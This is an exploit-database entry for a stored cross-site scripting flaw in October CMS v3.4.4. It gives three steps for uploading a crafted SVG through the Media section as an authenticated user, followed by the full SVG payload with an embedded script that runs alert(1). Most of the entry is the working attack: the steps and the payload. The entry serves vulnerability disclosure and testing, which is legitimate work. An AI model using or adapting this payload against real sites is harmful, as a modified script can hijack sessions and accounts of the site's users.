Share
## https://sploitus.com/exploit?id=PACKETSTORM:173812
#Exploit Title: October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated)  
#Date: 29 June 2023  
#Exploit Author: Okan Kurtulus  
#Vendor Homepage: https://octobercms.com  
#Version: v3.4.4  
#Tested on: Ubuntu 22.04  
#CVE : N/A  
  
# Proof of Concept:  
1โ€“ Install the system through the website and log in with any user with file upload authority.  
2โ€“ Select "Media" in the top menu. Prepare an SVG file using the payload below.  
3โ€“ Upload the SVG file and call the relevant file from the directory it is in. XSS will be triggered.  
  
#Stored XSS Payload:  
  
<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">  
  
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>  
<script type="text/javascript">  
alert(1);  
</script>  
</svg>